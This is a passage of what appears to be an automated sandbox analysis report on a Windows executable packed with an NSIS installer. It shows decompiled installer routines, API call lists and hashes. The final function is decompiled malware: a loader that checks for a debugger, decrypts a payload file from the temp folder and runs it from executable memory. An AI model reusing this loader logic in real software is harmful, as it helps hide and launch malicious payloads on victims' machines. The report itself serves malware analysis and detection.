										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\hardz\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































                                                                              0x00403153
                                                                              0x00403156
                                                                              0x0040315a
                                                                              0x0040315f
                                                                              0x00403164
                                                                              0x0040316b
                                                                              0x00403171
                                                                              0x00403187
                                                                              0x00403197
                                                                              0x0040319c
                                                                              0x004031a7
                                                                              0x004031ad
                                                                              0x004031b2
                                                                              0x004031b4
                                                                              0x004031da
                                                                              0x004031da
                                                                              0x004031e0
                                                                              0x004031ee
                                                                              0x00403202
                                                                              0x00403207
                                                                              0x00403209
                                                                              0x0040320b
                                                                              0x00403210
                                                                              0x00403210
                                                                              0x00403220
                                                                              0x00403226
                                                                              0x0040328f
                                                                              0x0040328f
                                                                              0x00403291
                                                                              0x00403293
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040322c
                                                                              0x0040322f
                                                                              0x00403237
                                                                              0x00403237
                                                                              0x0040323a
                                                                              0x0040323f
                                                                              0x00403241
                                                                              0x00403241
                                                                              0x00403242
                                                                              0x00403242
                                                                              0x00403247
                                                                              0x0040324a
                                                                              0x0040327f
                                                                              0x00403284
                                                                              0x00403289
                                                                              0x0040328c
                                                                              0x0040328e
                                                                              0x0040328e
                                                                              0x0040328e
                                                                              0x00000000
                                                                              0x0040324c
                                                                              0x0040324c
                                                                              0x0040324d
                                                                              0x00403250
                                                                              0x00403258
                                                                              0x0040325b
                                                                              0x0040325d
                                                                              0x0040325d
                                                                              0x0040325d
                                                                              0x0040325b
                                                                              0x00403260
                                                                              0x00403266
                                                                              0x0040326e
                                                                              0x00403271
                                                                              0x00403273
                                                                              0x00403273
                                                                              0x00403273
                                                                              0x00403271
                                                                              0x00403276
                                                                              0x0040327d
                                                                              0x00403297
                                                                              0x0040329b
                                                                              0x004032a4
                                                                              0x004032a9
                                                                              0x004032aa
                                                                              0x004032af
                                                                              0x004032b3
                                                                              0x00403316
                                                                              0x00403316
                                                                              0x0040331b
                                                                              0x00403323
                                                                              0x0040344e
                                                                              0x00403455
                                                                              0x00403471
                                                                              0x0040347e
                                                                              0x00403487
                                                                              0x00403489
                                                                              0x0040348b
                                                                              0x0040348d
                                                                              0x0040348f
                                                                              0x00403491
                                                                              0x00403493
                                                                              0x004034a3
                                                                              0x004034a5
                                                                              0x004034a7
                                                                              0x004034b4
                                                                              0x004034c3
                                                                              0x004034cb
                                                                              0x004034d3
                                                                              0x004034d3
                                                                              0x004034a7
                                                                              0x00403493
                                                                              0x0040348f
                                                                              0x004034d8
                                                                              0x004034de
                                                                              0x004034e0
                                                                              0x004034e4
                                                                              0x004034e4
                                                                              0x004034e0
                                                                              0x004034e9
                                                                              0x004034ee
                                                                              0x004034f1
                                                                              0x004034f3
                                                                              0x004034f3
                                                                              0x004034fb
                                                                              0x004034fb
                                                                              0x0040332f
                                                                              0x00403336
                                                                              0x00403336
                                                                              0x004032bb
                                                                              0x00403306
                                                                              0x00403306
                                                                              0x00403312
                                                                              0x00000000
                                                                              0x00403312
                                                                              0x004032c4
                                                                              0x004032d1
                                                                              0x004032c8
                                                                              0x004032ce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004032d0
                                                                              0x004032d0
                                                                              0x004032d0
                                                                              0x004032d5
                                                                              0x004032d7
                                                                              0x004032dc
                                                                              0x00403342
                                                                              0x0040334a
                                                                              0x00403350
                                                                              0x0040335f
                                                                              0x00403361
                                                                              0x0040336a
                                                                              0x00403375
                                                                              0x0040337f
                                                                              0x00403387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033b3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033c9
                                                                              0x004033d2
                                                                              0x004033de
                                                                              0x004033ee
                                                                              0x004033e0
                                                                              0x004033e6
                                                                              0x004033e6
                                                                              0x004033f9
                                                                              0x00403403
                                                                              0x0040340e
                                                                              0x00403415
                                                                              0x0040341b
                                                                              0x00403422
                                                                              0x00403429
                                                                              0x0040342c
                                                                              0x00403432
                                                                              0x00403432
                                                                              0x00403429
                                                                              0x00403434
                                                                              0x00403434
                                                                              0x0040343a
                                                                              0x0040343e
                                                                              0x00000000
                                                                              0x00403449
                                                                              0x004032de
                                                                              0x004032e1
                                                                              0x004032ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004032f4
                                                                              0x004032ff
                                                                              0x00403304
                                                                              0x00000000
                                                                              0x00403304
                                                                              0x00000000
                                                                              0x0040327d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403231
                                                                              0x00403231
                                                                              0x00403231
                                                                              0x00403232
                                                                              0x00403232
                                                                              0x00000000
                                                                              0x00403231
                                                                              0x00000000
                                                                              0x00403295
                                                                              0x004031bc
                                                                              0x004031c8
                                                                              0x004031d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • #17.COMCTL32 ref: 00403164
                                                                              • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                              • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                                • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                              • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 004031E0
                                                                              • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 004031F5
                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000020), ref: 00403220
                                                                              • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                              • ExitProcess.KERNEL32 ref: 00403336
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                              • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                              • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                              • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                              • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                              • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                              • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                              • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                              • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                              • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                              • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                              • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                              • ExitProcess.KERNEL32 ref: 004034FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                              • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\NdBLyH2h5d.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                              • API String ID: 3079827372-633356775
                                                                              • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                              • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                              • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                              • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 98%
                                                                              			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
						lstrcatA(0x7a0588, "\\*.*");
					}
					lstrcatA(_t74, 0x409010);
					_t72 =  &(_t74[lstrlenA(_t74)]);
					_t37 = FindFirstFileA(0x7a0588,  &_v332);
					__eflags = _t37 - 0xffffffff;
					_a4 = _t37;
					if(_t37 == 0xffffffff) {
						L26:
						__eflags = _v8;
						if(_v8 != 0) {
							_t31 = _t72 - 1;
							 *_t31 =  *(_t72 - 1) & 0x00000000;
							__eflags =  *_t31;
						}
						goto L28;
					} else {
						goto L9;
					}
					do {
						L9:
						_t77 =  &(_v332.cFileName);
						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
						__eflags =  *_t49;
						if( *_t49 != 0) {
							__eflags = _v332.cAlternateFileName;
							if(_v332.cAlternateFileName != 0) {
								_t77 =  &(_v332.cAlternateFileName);
							}
						}
						__eflags =  *_t77 - 0x2e;
						if( *_t77 != 0x2e) {
							L16:
							E004059BF(_t72, _t77);
							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D62(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x7a3008 =  *0x7a3008 + 1;
									} else {
										E00404D62(0xfffffff1, _t74);
										E00405707(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E00405301(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C94(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054CC(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D62(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D62(0xfffffff1, _t74);
							return E00405707(_t74, 0);
						}
						L30:
						 *0x7a3008 =  *0x7a3008 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                              0x0040530c
                                                                              0x00405310
                                                                              0x00405319
                                                                              0x0040531c
                                                                              0x0040531f
                                                                              0x00405327
                                                                              0x00405329
                                                                              0x0040532a
                                                                              0x00000000
                                                                              0x0040532a
                                                                              0x00405339
                                                                              0x00405339
                                                                              0x0040533c
                                                                              0x0040533f
                                                                              0x00405353
                                                                              0x0040535a
                                                                              0x0040535f
                                                                              0x00405361
                                                                              0x00405371
                                                                              0x00405363
                                                                              0x00405369
                                                                              0x00405369
                                                                              0x0040537c
                                                                              0x00405391
                                                                              0x00405393
                                                                              0x00405399
                                                                              0x0040539c
                                                                              0x0040539f
                                                                              0x00405461
                                                                              0x00405461
                                                                              0x00405465
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00405467
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053a5
                                                                              0x004053a5
                                                                              0x004053ae
                                                                              0x004053b4
                                                                              0x004053b9
                                                                              0x004053bc
                                                                              0x004053be
                                                                              0x004053c2
                                                                              0x004053c4
                                                                              0x004053c4
                                                                              0x004053c2
                                                                              0x004053c7
                                                                              0x004053ca
                                                                              0x004053dd
                                                                              0x004053df
                                                                              0x004053e4
                                                                              0x004053ea
                                                                              0x004053ec
                                                                              0x00405407
                                                                              0x0040540e
                                                                              0x00405414
                                                                              0x00405416
                                                                              0x0040543b
                                                                              0x00405418
                                                                              0x00405418
                                                                              0x0040541c
                                                                              0x00405430
                                                                              0x0040541e
                                                                              0x00405421
                                                                              0x00405429
                                                                              0x00405429
                                                                              0x0040541c
                                                                              0x004053ee
                                                                              0x004053f4
                                                                              0x004053f6
                                                                              0x004053fc
                                                                              0x004053fc
                                                                              0x004053f6
                                                                              0x00000000
                                                                              0x004053ec
                                                                              0x004053cc
                                                                              0x004053cf
                                                                              0x004053d1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053d3
                                                                              0x004053d5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004053d7
                                                                              0x004053db
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405440
                                                                              0x0040544a
                                                                              0x00405450
                                                                              0x00405450
                                                                              0x0040545b
                                                                              0x00000000
                                                                              0x00405341
                                                                              0x00405341
                                                                              0x00405343
                                                                              0x0040546b
                                                                              0x0040546e
                                                                              0x00405471
                                                                              0x004054c9
                                                                              0x004054c9
                                                                              0x004054c9
                                                                              0x00405473
                                                                              0x00405476
                                                                              0x00405481
                                                                              0x00405486
                                                                              0x00405488
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040548b
                                                                              0x00405496
                                                                              0x0040549d
                                                                              0x004054a3
                                                                              0x004054a5
                                                                              0x00000000
                                                                              0x004054c1
                                                                              0x004054a7
                                                                              0x004054ab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004054b0
                                                                              0x00000000
                                                                              0x004054b7
                                                                              0x00405478
                                                                              0x00405478
                                                                              0x00000000
                                                                              0x00405478
                                                                              0x00405349
                                                                              0x0040534d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040534d

                                                                              APIs
                                                                              • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040531F
                                                                              • lstrcatA.KERNEL32(007A0588,\*.*,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405369
                                                                              • lstrcatA.KERNEL32(?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 0040537C
                                                                              • lstrlenA.KERNEL32(?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405382
                                                                              • FindFirstFileA.KERNEL32(007A0588,?,?,?,00409010,?,007A0588,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 00405393
                                                                              • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 0040544A
                                                                              • FindClose.KERNEL32(?), ref: 0040545B
                                                                              Strings
                                                                              • "C:\Users\user\Desktop\NdBLyH2h5d.exe" , xrefs: 0040530B
                                                                              • \*.*, xrefs: 00405363
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405335
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\Desktop\NdBLyH2h5d.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-2473244286
                                                                              • Opcode ID: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                              • Instruction ID: f738604874d37791e21c186390ce59424126d5fa43ea1a12c0606eb471faeee6
                                                                              • Opcode Fuzzy Hash: 8380fa4691e2e165f963ed649da4ecfc2ff1d2e951a9b6cdbac17f467c00847b
                                                                              • Instruction Fuzzy Hash: 5B51E030804A04AADB216F228C49BFF3A78DF82759F14817BF944B51D2C77C5982DE6E
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 740D1000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89filememorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E740D1000() {
				long _v8;
				void* _v12;
				short _v532;
				void* _t15;
				int _t19;
				struct _OVERLAPPED* _t30;
				long _t38;
				void* _t41;

				_t30 = 0;
				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t15 = GetTempPathW(0x103,  &_v532);
				if(_t15 != 0) {
					lstrcatW( &_v532, L"\\ur15t24pnyduhs");
					_t15 = CreateFileW( &_v532, 0x80000000, 7, _t30, 3, 0x80, _t30); // executed
					_v12 = _t15;
					if(_t15 != 0xffffffff) {
						_t19 = GetFileSize(_t15, _t30);
						_t38 = _t19;
						if(_t38 == 0xffffffff) {
							L11:
							return _t19;
						}
						_t19 = VirtualAlloc(_t30, _t38, 0x3000, 4); // executed
						_t41 = _t19;
						if(_t41 == 0) {
							L10:
							goto L11;
						}
						_t19 = ReadFile(_v12, _t41, _t38,  &_v8, _t30); // executed
						if(_t19 == 0) {
							goto L10;
						}
						if(_v8 <= _t30) {
							L9:
							VirtualProtect(_t41, _t38, 0x40,  &_v8); // executed
							_t19 =  *_t41(); // executed
							goto L10;
						} else {
							goto L8;
						}
						do {
							L8:
							asm("rol cl, 0x3");
							 *((char*)(_t41 + _t30)) =  !( !(0x00000026 - ( !( *((intOrPtr*)(_t41 + _t30)) + 0x1b) + 0x0000005b ^ _t30) - 0x00000020 ^ 0x000000a7) - _t30) + 0x4f;
							_t30 =  &(_t30->Internal);
						} while (_t30 < _v8);
						goto L9;
					}
				}
				return _t15;
			}











                                                                              0x740d100a
                                                                              0x740d100c
                                                                              0x740d1017
                                                                              0x740d1019
                                                                              0x740d1019
                                                                              0x740d102b
                                                                              0x740d1033
                                                                              0x740d1045
                                                                              0x740d1062
                                                                              0x740d1068
                                                                              0x740d106e
                                                                              0x740d1073
                                                                              0x740d1079
                                                                              0x740d107e
                                                                              0x740d10ea
                                                                              0x00000000
                                                                              0x740d10ea
                                                                              0x740d108a
                                                                              0x740d1090
                                                                              0x740d1094
                                                                              0x740d10e9
                                                                              0x00000000
                                                                              0x740d10e9
                                                                              0x740d10a0
                                                                              0x740d10a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x740d10ad
                                                                              0x740d10d9
                                                                              0x740d10e1
                                                                              0x740d10e7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x740d10af
                                                                              0x740d10af
                                                                              0x740d10c1
                                                                              0x740d10d0
                                                                              0x740d10d3
                                                                              0x740d10d4
                                                                              0x00000000
                                                                              0x740d10af
                                                                              0x740d106e
                                                                              0x740d10ed

                                                                              APIs
                                                                              • IsDebuggerPresent.KERNEL32 ref: 740D100F
                                                                              • DebugBreak.KERNEL32 ref: 740D1019
                                                                              • GetTempPathW.KERNEL32(00000103,?), ref: 740D102B
                                                                              • lstrcatW.KERNEL32(?,\ur15t24pnyduhs), ref: 740D1045
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 740D1062
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 740D1073
                                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 740D108A
                                                                              • ReadFile.KERNELBASE(?,00000000,00000000,?,00000000), ref: 740D10A0
                                                                              • VirtualProtect.KERNELBASE(00000000,00000000,00000040,?), ref: 740D10E1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.221190830.00000000740D1000.00000080.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                                              • Associated: 00000000.00000002.221175968.00000000740D0000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.221197609.00000000740D2000.00000008.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.221201849.00000000740D3000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: File$Virtual$AllocBreakCreateDebugDebuggerPathPresentProtectReadSizeTemplstrcat
                                                                              • String ID: \ur15t24pnyduhs
                                                                              • API String ID: 1306962974-680157355
                                                                              • Opcode ID: 64ebc9382491af248a9db53b96dac7511460e5add4ad8dec7203493ad6a04ced
                                                                              • Instruction ID: 7c2958d9084aadc10a4a70f969e6b234e890ef9588bacc29a1a3feb07f049fb7
